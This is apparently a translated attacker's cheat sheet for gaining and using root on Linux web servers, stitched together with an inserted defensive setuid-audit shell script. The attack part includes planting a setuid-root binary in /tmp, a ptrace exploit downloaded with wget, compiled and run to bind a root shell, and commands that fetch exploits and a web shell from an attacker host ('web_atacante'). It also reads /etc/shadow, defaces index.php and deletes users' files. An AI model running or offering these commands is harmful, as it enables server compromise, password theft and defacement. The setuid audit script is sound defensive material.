[cnbird@localhost tmp]#id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk)
[cnbird@localhost tmp]#cp `which id ` .
[cnbird@localhost tmp]#chown root ./id
[cnbird@localhost tmp]#chmod 755 ./id ; chmod u+s ./id
[cnbird@localhost tmp]#ls -l ./id
-rwsr-xr-x 1 root root 9264 Mar 8 21:36 ./id*
[cnbird@localhost tmp]#exit
[cnbird@localhost tmp]$id
uid=500(cnbird) gid=500(cnbird) groups=500(cnbird)
[cnbird@localhost tmp]$./id
uid=500(cnbird) gid=500(cnbird) euid=0(root) groups=500(cnbird)
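The session above ends with a setuid-root copy of `id` sitting in /tmp, which is why `./id` reports euid=0. As an added example (not part of the original notes), this POSIX shell audit lists setuid/setgid files in directories that should contain none. The function names and the directories passed on the command line are assumptions.

```shell
#!/bin/sh
# Added example: audit directories where setuid/setgid files should never appear.
# Function names (find_suid, audit_suid) are hypothetical, chosen for this example.

# find_suid DIR...
# Print the path of every regular file under each DIR that carries the
# setuid (4000) or setgid (2000) bit. -xdev keeps find on one filesystem.
find_suid() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
    done
}

# audit_suid DIR...
# Print an `ls -ln` line per finding (numeric owner, so uid 0 stands out).
# Returns 0 when nothing is found, 1 when at least one file is flagged.
audit_suid() {
    # find exits non-zero on unreadable subdirectories; keep partial results.
    hits=$(find_suid "$@") || true
    if [ -z "$hits" ]; then
        return 0
    fi
    printf '%s\n' "$hits" | while IFS= read -r f; do
        ls -ln "$f"
    done
    return 1
}

# Run as a script, e.g.: sh audit_suid.sh /tmp /var/tmp /dev/shm
if [ "$#" -gt 0 ]; then
    audit_suid "$@" || echo "setuid/setgid files found: review them" >&2
fi
```

Mounting /tmp, /var/tmp and /dev/shm with the `nosuid` option makes the kernel ignore the bit on files stored there.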
2. How to become root using ptrace
[bash]# cd /tmp/; wget http://delivered.informaticahispana.org/ptrace.c; gcc ptrace.c -o ptrace; chmod -c 777 ptrace; ./ptrace
- Parent's PID is 2313. Child's PID is 2314.
- Attaching to 2315...
- Got the thread!!
- Waiting for the next signal...
- Injecting shellcode at 0x4000e85d
- Bind root shell on port 24876... =p
- Detached from modprobe thread.
- Committing suicide.....
[bash]# id
uid=0(root) gid=0(root) groups=0(root)
To list the domains hosted on the server:
---------------------------------------------------------
cat /etc/httpd/conf/httpd.conf|grep ServerName
cat /etc/httpd/conf/httpd.conf
cat /etc/localdomains
cat /etc/trueuserdomains
cat /etc/userdomains
---------------------------------------------------------
To view the kernel version:
---------------------------------------------------------
uname -a
---------------------------------------------------------
To modify an existing index:
---------------------------------------------------------
echo "RootBox was OwNz You" > index.php
---------------------------------------------------------
To upload, compile, grant execute permissions to, and run an exploit:
---------------------------------------------------------
cd /tmp/;wget http://web_atacante/exploit.c
cd /tmp/;cc exploit.c -o exploit_compilado
cd /tmp/;chmod -c 777 exploit_compilado
cd /tmp/;./exploit_compilado
This is the end of the process for an exploit.
---------------------------------------------------------
View the encrypted passwords of all users:
---------------------------------------------------------
cat /etc/shadow
---------------------------------------------------------
Delete a file:
---------------------------------------------------------
cd /home/juan/public_html/;rm import.htm
---------------------------------------------------------
Upload a file:
---------------------------------------------------------
cd /home/juan/public_html/;wget http://web_atacante/shell.php